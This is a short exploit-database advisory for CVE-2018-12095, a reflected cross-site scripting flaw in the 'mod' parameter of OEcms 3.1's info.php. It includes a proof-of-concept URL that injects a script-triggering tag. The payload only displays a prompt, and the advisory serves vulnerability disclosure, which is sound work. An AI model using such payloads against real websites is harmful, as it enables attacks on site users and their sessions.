OEcms 3.1 - Cross-Site Scripting

EDB-ID: 44895
Author: Renzi
Published: 2018-06-15
CVE: CVE-2018-12095
Type: Webapps
Platform: PHP
Vulnerable App: N/A

 # Author: Felipe "Renzi" Gabriel 
# Date: 2018-06-15
# Software: OEcms v3.1
# CVE: CVE-2018-12095

# Technical Details & Description:
# A Reflected Cross-Site Scripting web vulnerability has been discovered in the "OEcms v3.1" web-application.
# The vulnerability is located in the 'mod' parameter of the`info.php` action GET method request.

# PoC

http://Target/cms/info.php?mod=list"</|\><plaintext/onmouseover=prompt(/XSS/)>

Related Posts